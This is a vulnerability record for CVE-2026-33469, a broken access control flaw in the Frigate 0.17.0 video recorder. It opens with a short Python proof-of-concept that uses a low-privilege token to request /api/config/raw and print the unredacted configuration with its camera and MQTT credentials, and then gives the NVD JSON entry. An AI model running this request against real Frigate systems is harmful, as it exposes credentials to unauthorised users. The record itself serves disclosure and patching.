CVE-2026-33469

import requests # PoC for CVE-2026-33469 # Description: Retrieve sensitive config using a low-privilege user token. # Target: Frigate 0.17.0 target_url = "http://target-ip:5000/api/config/raw" # Replace with a valid authenticated session cookie or token auth_token = "LOW_PRIV_USER_TOKEN" headers = { "Authorization": f"Bearer {auth_token}", "Content-Type": "application/json" } try: response = requests.get(target_url, headers=headers) if response.status_code == 200: print("[+] Vulnerability Confirmed!") print("[+] Sensitive Configuration Data:") print(response.text) else: print(f"[-] Request failed with status code: {response.status_code}") print(response.text) except Exception as e: print(f"[-] Error occurred: {e}")

{"cve": {"id": "CVE-2026-33469", "sourceIdentifier": "[email protected]", "published": "2026-03-26T17:16:41.157", "lastModified": "2026-03-31T13:07:34.250", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Frigate is a network video recorder (NVR) with realtime local object detection for IP cameras. In version 0.17.0, an authenticated non-admin user can retrieve the full raw Frigate configuration through `/api/config/raw`. This exposes sensitive values that are intentionally redacted from `/api/config`, including camera credentials, go2rtc stream credentials, MQTT passwords, proxy secrets, and any other secrets stored in `config.yml`. This appears to be a broken access control issue introduced by the admin-by-default API refactor: `/api/config/raw_paths` is admin-only, but `/api/config/raw` is still accessible to any authenticated user. Version 0.17.1 contains a patch."}, {"lang": "es", "value": "Frigate es un grabador de vídeo en red (NVR) con detección de objetos local en tiempo real para cámaras IP. En la versión 0.17.0, un usuario autenticado no administrador puede recuperar la configuración completa sin procesar de Frigate a través de `/api/config/raw`. Esto expone valores sensibles que son intencionalmente redactados de `/api/config`, incluyendo credenciales de cámara, credenciales de flujo de go2rtc, contraseñas MQTT, secretos de proxy y cualquier otro secreto almacenado en `config.yml`. Esto parece ser un problema de control de acceso roto introducido por la refactorización de la API de administrador por defecto: `/api/config/raw_paths` es solo para administradores, pero `/api/config/raw` sigue siendo accesible para cualquier usuario autenticado. La versión 0.17.1 contiene un parche."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-863"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:frigate:frigate:0.17.0:*:*:*:*:*:*:*", "matchCriteriaId": "FB927AB9-39C9-4351-9838-750C739C0C59"}]}]}], "references": [{"url": "https://github.com/blakeblackshear/frigate/security/advisories/GHSA-26g3-f8g8-9ffh", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}, {"url": "https://github.com/blakeblackshear/frigate/security/advisories/GHSA-26g3-f8g8-9ffh", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}]}}